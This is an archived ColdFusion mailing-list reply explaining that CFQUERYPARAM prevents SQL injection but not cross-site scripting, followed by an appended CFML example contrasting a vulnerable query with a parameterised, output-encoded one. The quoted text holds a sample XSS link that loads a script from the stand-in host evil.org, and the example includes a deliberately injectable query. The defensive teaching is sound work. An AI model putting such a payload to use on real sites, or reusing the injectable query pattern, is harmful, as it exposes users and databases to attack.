> More evil is stuff like:
>
> <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
> SRC='http://evil.org/badkama.js' ...

I don't know what you mean by "more evil", but generally speaking SQL injection attacks are considered to be a more serious problem than cross-site scripting attacks. Fortunately, though, it's quite easy to prevent them entirely - it's not so easy to prevent cross-site scripting attacks.

> I've always hated cfqueryparaming everything, or generally
> hand-coding any database CRUD.

You don't need to "hand-code database CRUD" to use CFQUERYPARAM. There's really no excuse for not using it. Even the Dreamweaver 8 code-generation wizards generate CFQUERYPARAM tags.

> A link for stuff cfqueryparam might not catch (with examples):
> http://www.technicalinfo.net/papers/CSS.html

No, CFQUERYPARAM won't catch cross-site scripting exploits. It's not intended to do that. It does, however, guarantee prevention of SQL injection exploits.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:250993
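The distinction drawn in the reply above (CFQUERYPARAM stops SQL injection but does nothing for cross-site scripting) is easiest to see side by side. The following is an added example, not code from the original message or from Fig Leaf Software; it assumes a datasource named `appDS` and a table `users(id, username)`, both made up for illustration.

```cfml
<!--- Constructed example (not from the original post). Assumes a datasource
      "appDS" and a table users(id, username); both names are hypothetical. --->

<!--- VULNERABLE: URL.id is pasted straight into the SQL text, so whatever the
      caller supplies becomes part of the statement rather than a value. --->
<cfquery name="qUserUnsafe" datasource="appDS">
    SELECT id, username FROM users WHERE id = #URL.id#
</cfquery>

<!--- SAFE: cfqueryparam sends the value as a typed bind parameter. It can only
      ever be data, and a non-integer value is rejected before the query runs. --->
<cfquery name="qUser" datasource="appDS">
    SELECT id, username FROM users
    WHERE id = <cfqueryparam value="#URL.id#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- cfqueryparam protects the query only. A username that was stored with
      <script> in it comes back out of the database unchanged, so output still
      needs HTML encoding. HTMLEditFormat() does that here; CF10 and later
      also provide EncodeForHTML(). --->
<cfoutput query="qUser">
    <p>Hello, #HTMLEditFormat(qUser.username)#</p>
</cfoutput>
```

Use `cf_sql_varchar` (with `maxlength` where the column is bounded) for string columns; the type on the parameter is what lets the database driver refuse an out-of-type value instead of interpreting it.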

